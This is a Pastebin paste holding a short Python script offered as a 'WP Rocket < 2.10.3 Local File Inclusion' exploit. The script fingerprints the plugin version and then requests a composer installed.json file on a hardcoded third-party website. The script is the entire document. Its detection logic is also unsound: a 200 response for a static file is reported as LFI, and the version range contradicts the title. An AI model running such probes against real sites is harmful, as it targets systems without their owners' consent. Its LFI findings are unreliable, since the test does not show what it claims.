Advertisement
FlyFar

WP Rocket < 2.10.3 - Local File Inclusion (LFI)

Feb 29th, 2024
986
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.44 KB | Cybersecurity | 0 0
  1.  
  2. import requests
  3. import time
  4.  
  5. def check_wp_rocket_version(url):
  6.     version_url = url + "/wp-rocket/css/rocket.css"
  7.     try:
  8.         response = requests.get(version_url)
  9.         version = response.headers["X-Powered-By"]
  10.         if "WP Rocket/" in version:
  11.             version = version.split("/")[1]
  12.             return version
  13.     except Exception as e:
  14.         print(f"Error occurred while fetching WP Rocket version: {e}")
  15.     return None
  16.  
  17. def test_wp_rocket_lfi_bug(url):
  18.     lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json"
  19.     try:
  20.         response = requests.get(lfi_url)
  21.         if response.status_code == 200:
  22.             return True
  23.     except Exception as e:
  24.         print(f"Error occurred while testing LFI: {e}")
  25.     return False
  26.  
  27. def main():
  28.     url = "http://arvatools.com"
  29.     wp_rocket_version = check_wp_rocket_version(url)
  30.     if wp_rocket_version:
  31.         print(f"WP Rocket Version: {wp_rocket_version}")
  32.         if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
  33.             result = test_wp_rocket_lfi_bug(url)
  34.             if result:
  35.                 print("LFI vulnerability found in WP Rocket")
  36.             else:
  37.                 print("LFI vulnerability not found in WP Rocket")
  38.         else:
  39.             print("WP Rocket version is not affected by the LFI bug")
  40.     else:
  41.         print("Unable to fetch WP Rocket version")
  42.  
  43. if __name__ == "__main__":
  44.     main()
  45.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement